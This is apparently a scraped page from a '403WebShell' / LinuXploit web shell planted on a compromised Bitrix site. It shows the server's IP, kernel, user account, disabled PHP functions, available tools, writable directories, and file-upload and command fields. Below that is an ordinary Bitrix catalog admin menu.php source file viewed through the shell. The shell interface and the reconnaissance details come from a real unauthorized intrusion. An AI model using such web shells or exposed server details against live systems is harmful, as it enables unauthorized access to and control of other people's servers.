%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.191.223.239
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/catalog/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/catalog/admin/menu.php
<?
use Bitrix\Main\ModuleManager,
	Bitrix\Main\Loader,
	Bitrix\Catalog;

if (ModuleManager::isModuleInstalled('sale'))
	return false;

if (!Loader::includeModule('catalog'))
	return false;

IncludeModuleLangFile(__FILE__);

$boolRead = $USER->CanDoOperation('catalog_read');
$boolDiscount = $USER->CanDoOperation('catalog_discount');
$boolStore = $USER->CanDoOperation('catalog_store');
$boolGroup = $USER->CanDoOperation('catalog_group');
$boolPrice = $USER->CanDoOperation('catalog_price');
$boolVat = $USER->CanDoOperation('catalog_vat');
$boolMeasure = $USER->CanDoOperation('catalog_measure');
$boolExportEdit = $USER->CanDoOperation('catalog_export_edit');
$boolExportExec = $USER->CanDoOperation('catalog_export_exec');
$boolImportEdit = $USER->CanDoOperation('catalog_import_edit');
$boolImportExec = $USER->CanDoOperation('catalog_import_exec');

global $adminMenu;

if (!function_exists("__get_export_profiles"))
{
	function __get_export_profiles($strItemID)
	{
		// this code is copy CCatalogAdmin::OnBuildSaleExportMenu
		global $USER;

		global $adminMenu;

		if (!isset($USER) || !(($USER instanceof CUser) && ('CUser' == get_class($USER))))
			return array();

		if (empty($strItemID))
			return array();

		$boolRead = $USER->CanDoOperation('catalog_read');
		$boolExportEdit = $USER->CanDoOperation('catalog_export_edit');
		$boolExportExec = $USER->CanDoOperation('catalog_export_exec');

		$arProfileList = array();

		if (($boolRead || $boolExportEdit || $boolExportExec) && method_exists($adminMenu, "IsSectionActive"))
		{
			if ($adminMenu->IsSectionActive($strItemID))
			{
				$rsProfiles = CCatalogExport::GetList(array("NAME"=>"ASC", "ID"=>"ASC"), array("IN_MENU"=>"Y"));
				while ($arProfile = $rsProfiles->Fetch())
				{
					$strName = ($arProfile["NAME"] <> '' ? $arProfile["NAME"] : $arProfile["FILE_NAME"]);
					if ('Y' == $arProfile['DEFAULT_PROFILE'])
					{
						$arProfileList[] = array(
							"text" => htmlspecialcharsbx($strName),
							"url" => "cat_exec_exp.php?lang=".LANGUAGE_ID."&ACT_FILE=".$arProfile["FILE_NAME"]."&ACTION=EXPORT&PROFILE_ID=".$arProfile["ID"]."&".bitrix_sessid_get(),
							"title" => GetMessage("CAM_EXPORT_DESCR_EXPORT")." &quot;".htmlspecialcharsbx($strName)."&quot;",
							"readonly" => !$boolExportExec,
						);
					}
					else
					{
						$arProfileList[] = array(
							"text" => htmlspecialcharsbx($strName),
							"url" => "cat_export_setup.php?lang=".LANGUAGE_ID."&ACT_FILE=".$arProfile["FILE_NAME"]."&ACTION=EXPORT_EDIT&PROFILE_ID=".$arProfile["ID"]."&".bitrix_sessid_get(),
							"title"=>GetMessage("CAM_EXPORT_DESCR_EDIT")." &quot;".htmlspecialcharsbx($strName)."&quot;",
							"readonly" => !$boolExportEdit,
						);
					}
				}
			}
		}
		return $arProfileList;
	}
}

if (!function_exists("__get_import_profiles"))
{
	function __get_import_profiles($strItemID)
	{
		global $USER;

		global $adminMenu;

		if (!isset($USER) || !(($USER instanceof CUser) && ('CUser' == get_class($USER))))
			return array();

		if (empty($strItemID))
			return array();

		$boolRead = $USER->CanDoOperation('catalog_read');
		$boolImportEdit = $USER->CanDoOperation('catalog_import_edit');
		$boolImportExec = $USER->CanDoOperation('catalog_import_exec');

		$arProfileList = array();

		if (($boolRead || $boolImportEdit || $boolImportExec) && method_exists($adminMenu, "IsSectionActive"))
		{
			if ($adminMenu->IsSectionActive($strItemID))
			{
				$rsProfiles = CCatalogImport::GetList(array("NAME"=>"ASC", "ID"=>"ASC"), array("IN_MENU"=>"Y"));
				while ($arProfile = $rsProfiles->Fetch())
				{
					$strName = ($arProfile["NAME"] <> '' ? $arProfile["NAME"] : $arProfile["FILE_NAME"]);
					if ('Y' == $arProfile['DEFAULT_PROFILE'])
					{
						$arProfileList[] = array(
							"text" => htmlspecialcharsbx($strName),
							"url" => "cat_exec_imp.php?lang=".LANGUAGE_ID."&ACT_FILE=".$arProfile["FILE_NAME"]."&ACTION=IMPORT&PROFILE_ID=".$arProfile["ID"]."&".bitrix_sessid_get(),
							"title" => GetMessage("CAM_IMPORT_DESCR_IMPORT")." &quot;".htmlspecialcharsbx($strName)."&quot;",
							"readonly" => !$boolImportExec,
						);
					}
					else
					{
						$arProfileList[] = array(
							"text" => htmlspecialcharsbx($strName),
							"url" => "cat_import_setup.php?lang=".LANGUAGE_ID."&ACT_FILE=".$arProfile["FILE_NAME"]."&ACTION=IMPORT_EDIT&PROFILE_ID=".$arProfile["ID"]."&".bitrix_sessid_get(),
							"title" => GetMessage("CAM_IMPORT_DESCR_EDIT")." &quot;".htmlspecialcharsbx($strName)."&quot;",
							"readonly" => !$boolImportEdit,
						);
					}
				}
			}
		}

		return $arProfileList;
	}
}

$arSubItems = array();

if ($boolRead || $boolDiscount)
{
	$dscItems = array();
	$dscItems[] = array(
		"text" => GetMessage("CM_DISCOUNTS2"),
		"url" => "cat_discount_admin.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_discount_edit.php"),
		"title" => GetMessage("CM_DISCOUNTS_ALT2"),
		"readonly" => !$boolDiscount,
		"items_id" => "cat_discount_admin",
	);
	$dscItems[] = array(
		"text" => GetMessage("CM_COUPONS"),
		"url" => "cat_discount_coupon.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_discount_coupon_edit.php"),
		"title" => GetMessage("CM_COUPONS_ALT"),
		"readonly" => !$boolDiscount,
		"items_id" => "cat_discount_coupon",
	);
	$arSubItems[] = array(
		"text" => GetMessage("CM_DISCOUNTS"),
		"more_url" => array("cat_discount_edit.php", "cat_discount_coupon.php", "cat_discount_coupon_edit.php"),
		"title" => GetMessage("CM_DISCOUNTS_ALT"),
		"dynamic" => false,
		"module_id" => "catalog",
		"items_id" => "mnu_catalog_discount",
		"readonly" => !$boolDiscount,
		"page_icon" => "catalog_page_icon",
		"items" => $dscItems,
	);
	if (Catalog\Config\Feature::isCumulativeDiscountsEnabled())
	{
		$arSubItems[] = array(
			"text" => GetMessage("CAT_DISCOUNT_SAVE"),
			"url" => "cat_discsave_admin.php?lang=".LANGUAGE_ID,
			"more_url" => array("cat_discsave_edit.php"),
			"title" => GetMessage("CAT_DISCOUNT_SAVE_DESCR"),
			"readonly" => !$boolDiscount,
			"items_id" => "cat_discsave_admin",
		);
	}
}

if ($boolRead || $boolStore)
{
	if ($boolStore && Catalog\Config\State::isUsedInventoryManagement())
	{
		$arSubItems[] = array(
			"text" => GetMessage("CM_STORE_DOCS"),
			"url" => "cat_store_document_list.php?lang=".LANGUAGE_ID,
			"more_url" => array("cat_store_document_edit.php"),
			"title" => GetMessage("CM_STORE_DOCS"),
			"readonly" => !$boolStore,
			"items_id" => "cat_store_document_list",
		);

		$arSubItems[] = array(
			"text" => GetMessage("CM_CONTRACTORS"),
			"url" => "cat_contractor_list.php?lang=".LANGUAGE_ID,
			"more_url" => array("cat_contractor_edit.php"),
			"title" => GetMessage("CM_CONTRACTORS"),
			"readonly" => !$boolStore,
			"items_id" => "cat_contractor_list",
		);
	}
	$arSubItems[] = array(
		"text" => GetMessage("CM_STORE"),
		"url" => "cat_store_list.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_store_edit.php"),
		"title" => GetMessage("CM_STORE"),
		"readonly" => !$boolStore,
		"items_id" => "cat_store_list",
	);
}

if ($boolRead || $boolMeasure)
{
	$arSubItems[] = array(
		"text" => GetMessage("MEASURE"),
		"url" => "cat_measure_list.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_measure_edit.php"),
		"title" => GetMessage("MEASURE_ALT"),
		"readonly" => !$boolMeasure,
		"items_id" => "cat_measure_list",
	);
}

$showPrices = $boolRead || $boolGroup;
$showExtra = (Catalog\Config\Feature::isMultiPriceTypesEnabled() && ($boolRead || $boolPrice));
if ($showPrices || $showExtra)
{
	$section = array(
		'text' => GetMessage('PRICES_SECTION'),
		'title' => GetMessage('PRICES_SECTION_TITLE'),
		"url" => "cat_group_admin.php?lang=".LANGUAGE_ID,
		'items_id' => 'menu_catalog_prices',
		'items' => array()
	);
	if ($showPrices)
	{
		$section['items'][] = array(
			"text" => GetMessage("GROUP"),
			"title" => GetMessage("GROUP_ALT"),
			"url" => "cat_group_admin.php?lang=".LANGUAGE_ID,
			"more_url" => array("cat_group_edit.php"),
			"readonly" => !$boolGroup,
			"items_id" => "cat_group_admin",
		);
		$section['items'][] = array(
			'text' => GetMessage('PRICE_ROUND'),
			'title' => GetMessage('PRICE_ROUND_TITLE'),
			'url' => 'cat_round_list.php?lang='.LANGUAGE_ID,
			'more_url' => array('cat_round_edit.php'),
			'readonly' => !$boolGroup,
			"items_id" => "cat_round_list",
		);
	}
	if ($showExtra)
	{
		$section['items'][] = array(
			"text" => GetMessage("EXTRA"),
			"title" => GetMessage("EXTRA_ALT"),
			"url" => "cat_extra.php?lang=".LANGUAGE_ID,
			"more_url" => array("cat_extra_edit.php"),
			"readonly" => !$boolPrice,
			"items_id" => "cat_extra",
		);
	}
	$arSubItems[] = $section;
	unset($section);
}
unset($showExtra, $showPrices);

if ($boolRead || $boolVat)
{
	$arSubItems[] = array(
		"text" => GetMessage("VAT"),
		"url" => "cat_vat_admin.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_vat_edit.php"),
		"title" => GetMessage("VAT_ALT"),
		"readonly" => !$boolVat,
		"items_id" => "cat_vat_admin",
	);
}

if ($boolRead || $boolExportEdit || $boolExportExec)
{
	$arSubItems[] = array(
		"text" => GetMessage("SETUP_UNLOAD_DATA"),
		"url" => "cat_export_setup.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_exec_exp.php"),
		"title" => GetMessage("SETUP_UNLOAD_DATA_ALT"),
		"dynamic" => true,
		"module_id" => "catalog",
		"items_id" => "mnu_catalog_exp",
		"readonly" => !$boolExportEdit && !$boolExportExec,
		"items" => __get_export_profiles("mnu_catalog_exp"),
	);
}

if ($boolRead || $boolImportEdit || $boolImportExec)
{
	$arSubItems[] = array(
		"text" => GetMessage("SETUP_LOAD_DATA"),
		"url" => "cat_import_setup.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_exec_imp.php"),
		"title" => GetMessage("SETUP_LOAD_DATA_ALT"),
		"dynamic" => true,
		"module_id" => "catalog",
		"items_id" => "mnu_catalog_imp",
		"readonly" => !$boolImportEdit && !$boolImportExec,
		"items" => __get_import_profiles("mnu_catalog_imp"),
	);
}

if ($boolRead)
{
	$arSubItems[] = array(
		"text" => GetMessage("SUBSCRIPTION_PRODUCT"),
		"url" => "cat_subscription_list.php?lang=".LANGUAGE_ID,
		"more_url" => array("cat_subscription_list.php"),
		"title" => GetMessage("SUBSCRIPTION_PRODUCT"),
		"items_id" => "cat_subscription_list",
	);
}

if (empty($arSubItems))
	return false;

return array(
	"parent_menu" => "global_menu_store",
	"section" => "catalog",
	"sort" => 200,
	"text" => GetMessage("CATALOG_CONTROL"),
	"title" => GetMessage("CATALOG_MNU_TITLE"),
	"icon" => "trade_catalog_menu_icon",
	"page_icon" => "catalog_page_icon",
	"items_id" => "mnu_catalog",
	"items" => $arSubItems,
);

Youez - 2016 - github.com/yon3zu
LinuXploit